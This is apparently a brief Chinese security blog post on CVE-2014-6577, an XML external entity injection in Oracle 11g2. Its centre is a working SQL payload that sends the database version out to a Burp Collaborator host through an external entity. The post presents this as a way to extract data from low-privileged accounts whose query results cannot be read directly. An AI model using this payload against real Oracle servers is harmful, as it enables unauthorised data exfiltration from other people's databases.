ORACLE XXE注入-CVE-2014-6577

发布于 12 天前  30 次阅读


编号:CVE-2014-6577
影响范围:11g2 (其他版本未测试)
修复方法: 官方已发布安全补丁

 SQL> select UTL_HTTP.REQUEST('http://baidu.com') From dual;
select UTL_HTTP.REQUEST('http://baidu.com') From dual*
第 1 行出现错误:
ORA-29273: HTTP 请求失败
ORA-06512: 在 "SYS.UTL_HTTP", line 1722
ORA-24247: 网络访问被访问控制列表 (ACL) 拒绝
ORA-06512: 在 line 1
当Oracle可执行SQL查询的时候但无法获取返回结果,且当前账户被降权的时候,可利用Oracle的XML注入结合DNSlog获取数据。
Payload:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://4chkqt9moslix6yf55pwgad17sdi17.burpcollaborator.net/'||(select version from v$instance)||'"> %remote; %param1;]>'),'/l') from dual

一沙一世界,一花一天堂。君掌盛无边,刹那成永恒。